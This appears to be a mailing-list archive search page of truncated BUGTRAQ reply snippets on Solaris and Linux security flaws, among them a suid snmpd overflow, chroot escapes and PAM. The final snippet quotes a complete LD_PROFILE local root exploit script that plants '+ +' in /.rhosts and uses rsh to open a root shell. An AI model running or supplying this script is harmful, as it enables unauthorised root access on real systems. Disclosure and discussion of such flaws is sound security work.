>(http://www.enteract.com/~robt/Docs/Howto/Sun/sniffer-trick.txt) by Rob
>Thomas, it was brought to my attention that a sniffer can be silently
>sitting on an unplumb'ed interface on Solaris. Not only is this dangerous
This is actually very similar to how the stealth mode of the SunScreen
firewal
>> > This was on my Debian 2.2 potato system (It doesn't dump core though).
>> Just for the record:
>> on a lot of systems (including Debian), 'man' is not suid/sgid anything,
and
>> this doesn't impose a security problem.
>> I don't know about Suse/Redhat/others.
>
>SuSE ships the /usr/bin/man co
>* Darren Moffat <[EMAIL PROTECTED]> [010205 19:24]:
>> Exactly what is it that man MUST do to perform the job of turning nroff
>> man pages into viewable text ?
Given the replies I got that are similar to the one below I should have
been move explicit - I knew this but wa
>The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root
>and contains a buffer overflow, the problem occurs when it copy his own
>name (argv[0]) to an internal variable without checking out
>its lenght and this causes the overflow.
>
>Vulnerable Version
>
>Sun Solaris 5.8
First there is
> Ok, the example wasn't good.
> It was a long day for me, thus, please forgive me that slip-up.
>
This is certainly a much better example, but:
> On example, many httpd servers works with the same privilages,
> it means that you can read any CGI temporary file, and other
> files readable only by
>We called Sun today, and obviously they don't give a damn. They refuse to
>consider this as a bug, as long as it is possible to correct the problem via
>the rmmount.conf file (which is true).
Firstly I can only give my applogies for this, and assure everyone on
BUGTRAQ that I am looking into thi
>You can run the server as root or as some other user. In order to use PAM
>(Pluggable Authentication Module) it has to run as root.
A general comment about PAM rather than this specific problem.
It is NOT a requirement of the PAM framework that application be running as
root. There are two cas
>corrected. The spellhist file, however, still uses the same permissions as
>Solaris 7 did. Granted this issue wont result in a root
>compromise it does allow for users to fill up the /var partition without
>having root access.
The 666 permissions are required for spell to work as designed and
> The dish of the day is the Yellow Pages/NIS (NYS?) suite
>shipped with the pristine RedHat 6.1. After a standard blank installation
>the rpc.yppasswd (when used via ypasswd by domain lusers from all over the
>place) shamelessly uses the old (deprecated?) 8-character-limited des
This is r
>Last but not least, I am very interested in Kris Kennaway's claim that "It
may
>also be possible to break out of the chroot jail on some platforms." If
It is possible, especially if you have /proc mounted. It is made even
more likely if you have processes inside and outside of the chroot
envir
>on all solaris/sparc app's i have used so far, there is a reason,
>why SUN does enable stack execution by default, if i am correctly
>informed this is due to some fortran or rare/old compiler issue,
>and might break some fortran or other alien language code...
Correct, some lisp and Objective C
>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
># LD_PROFILE local root exploit for solaris
># [EMAIL PROTECTED] 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + > /.rhosts
>rsh -l root localhost csh -i
This was bug# 4150646/1
12 matches
Mail list logo